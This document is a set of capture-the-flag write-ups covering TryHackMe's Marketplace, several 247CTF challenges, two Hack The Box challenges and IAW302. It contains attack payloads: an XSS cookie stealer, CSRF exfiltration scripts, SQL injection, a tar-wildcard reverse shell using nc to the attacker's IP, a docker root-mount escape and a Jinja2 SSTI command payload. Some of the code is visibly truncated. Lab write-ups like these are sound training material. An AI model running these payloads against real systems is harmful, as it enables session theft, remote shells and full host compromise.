TryHackMe solution: The Marketplace


#1 “What is flag 1?

First, we need to register as a new user and then login. View the first listing, there is a reporting feature.

In New listing, we can add new with a description, I think it may be vulnerable to XSS.

I try the payload.


And it worked.

So we will create a new listing with the description is a payload.

var req = new XMLHttpRequest();'post','/contact/a',true);
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

This payload will send cookie of anyone who view the listing to us as a message.

To make sure that the admin will view this listing, we will send a report to them by “Report listing to admins” option.

After reporting, we will receive the admin’s cookie.

Use this cookie to access Administration panel and we get the first flag.

#2 “What is flag 2? (User.txt)

As the admin, we can see the list of user.

Click an user and we access: /admin?user=1

I try:


And we get an error message.

And this web is also vulnerable to SQLi when using MySQL.

To find the tables in this database, we use:


Find all columns in table users.


Find all information of users.


Do the same to the table messages. Find all columns.


Find all content of this table.


This is the message from system to jake, so we have the ssh password of user jake.

Try to ssh to this server.

ssh jake@

And we have the second flag.

#3 “What is flag 3? (Root.txt)

See what jake can run with sudo.

sudo -l

We can run file /opt/backups/ as michael.

This post guide us how to abusing wildcards for tar.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 1234 >/tmp/f" >
echo "" > "--checkpoint-action=exec=sh"
echo "" > --checkpoint=1

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Next, we execute

chmod 777 backup.tar
chmod 777
sudo -u michael ./

to let michael have permission to run the file, and get michael‘s shell.

Michael is in group docker. Then, we will create a new container mounting the root filesystem.


python3 -c 'import pty; pty.spawn("/bin/sh")'

to spawning a TTY Shell.

See list of images with:

docker image ls

We will use alpine to create a container.

docker run -v /:/mnt --rm -it alpine sh

-v /:/mnt : mount the root directory of host to /mnt inside the container
--rm : remove the container after the user exits
-it : interactive and assign a tty
alpine : image to use to create container
sh : binary to run when the container starts

And we have the flag in /mnt/root.

Reference: The Marketplace : TryHackMe

247CTF solution: Forgotten file pointer

We know that the flag is in /tmp/flag.txt and we have to send a parameter named include to the server with method GET to read a file.

PHP have a bug named Cannot open file descriptor streams, then we will brute force to find the flag.<i>

With 0 <= i <= 99, because include‘s length is less than or equal to 10.

We use:

for i in $(seq 0 99); do echo; echo "Testing fd $i"; curl -s$i | grep 247; done

The flag is printed when i = 10.

247CTF solution: Helicopter Administrators


In this challenge, we have a comment function, so i think it might be vulnerable to XSS.

There is a note when reporting, after researching from this note, I found the XSS payload that works:

<style onload=alert("niek")></style>


We cannot access the admin’s page, so I think about a CSRF vulnerability where the admin will access the page and comment the page source so that we can see it.

We will comment on the user number 3 (or 2) and make the admin comment on the 1.

<style onload="var req = new XMLHttpRequest();
req.onload = handleResponse;'get','/user/0',true);
function handleResponse() {
    var res = btoa(this.responseText);
    var commentReq = new XMLHttpRequest();'post', '/comment/1', true);
    commentReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

After comment, we report this user so that the admin will view this page and trigger the XSS and CSRF.

Then go to the user number 1 and we have the content of admin’s page in base64. Decode it (change all spaces into +), we can see there is a search function.

<div class="mt-25">
  <form class="navbar-form" method="POST" action="/secret_admin_search" comment="#search-response">
    <div id="search-response" class="description"></div>
    <div class="input-group">    
      <input type="text" class="form-control description" id="search" name="search">
      <span class="input-group-btn">
        <input type="submit" class="btn btn-default search" value="User ID Search">

Then, I think about testing CSRF with the search function, the admin will search and comment the result in user 1’s page for us.

I use payload:

<style onload="var req = new XMLHttpRequest();
req.onload = handleResponse;'post','/secret_admin_search',true);
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
function handleResponse() {
    var res = btoa(this.responseText);
    var commentReq = new XMLHttpRequest();'post', '/comment/1', true);
    commentReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

Again, we received a base64 string, change all spaces to + and decode it:

{"message":"SQLite error: no such column: a","result":"error"}

So the web is using SQLite and it is vulnerable to SQL injection.

SQL injection

If we use the payload:


We can see the information of an user.

{"message":[[1,"Michael Owens",14,22,3,"Sydney, Australia"]],"result":"success"}

We can list all table in the database with:


There is a table named flag.

{"message":[[1,"Michael Owens",14,22,3,"Sydney, Australia"],[1,"comment",1,1,1,null],[1,"flag",1,1,1,null],[1,"user",1,1,1,null]],"result":"success"}

Next, we find the column’s name of that table.

{"message":[[1,"CREATE TABLE flag (flag text)",1,1,1,null],[1,"Michael Owens",14,22,3,"Sydney, Australia"]],"result":"success"}

Now, we have column ‘flag‘ in table ‘flag‘. Let’s get it.

<style onload="var req = new XMLHttpRequest();
req.onload = handleResponse;'post','/secret_admin_search',true);
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
function handleResponse() {
    var res = btoa(this.responseText);
    var commentReq = new XMLHttpRequest();'post', '/comment/1', true);
    commentReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

And we found the flag.

{"message":[[1,"247CTF{XXXXX}",1,1,1,null],[1,"Michael Owens",14,22,3,"Sydney, Australia"]],"result":"success"}

247CTF solution: Secured session

In this challenge, we have code in python. As we read the file, we can see that before the web compare the parameter secret_key with os.urandom(24), the session is already set equal to the flag.

So, we only need to get the session of the page:


Decode this base64 string twice and we can get the flag.

Hack The Box solution: Emdee five for life

Access the page and we get:

Try submit button:

Then, we need to submit the string in MD5 really fast, we will need to code a simple program.

The page source is:

and we can extract the string with a regex:


Code in python3:

import requests
import hashlib
import re



data={'hash': out}
out = = url, data = data)


Flag: HTB{N1c3_ScrIpt1nG_B0i!}

Hack The Box solution: Templated

When accessing the page, we get a message:

Do a little research, we find out that Flask/Jinja2 has a Server-side template injection vulnerability.

To confirm that, try to access: /{{7*7}}

and we get:

To execute a command, we just need to use a simple payload from Server Side Template Injection with Jinja2:


Then, we get:

The 'id' command executed, try ‘ls’ command and get:

There is a file named ‘flag.txt’, so we read that file with:

/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}

Flag: HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!}

CTF write up: IAW302

In this challenge, we will play Among Us.

Click a name and we will be redirected to the result page: /result.php?choose=CT1

Delete parameter ‘choose‘ to access ‘result.php’ and we have:

Therefore, we need to use Race Condition to pass unlink() function and run echo.

Python2 code is:

from multiprocessing import Process
import requests

def f():
  r = requests.get("")
  print r.text

if __name__ == '__main__':
  while 1:
    p = Process(target=f )
    p2 = Process(target=f )
    p3 = Process(target=f )
    p4 = Process(target=f )
    p5 = Process(target=f )


    print "-----------------------"

And we found the flag.

Flag: FUSEC{Hua_voi_moi_nguoi_lan_nay_lan_cuoi_dao_de}

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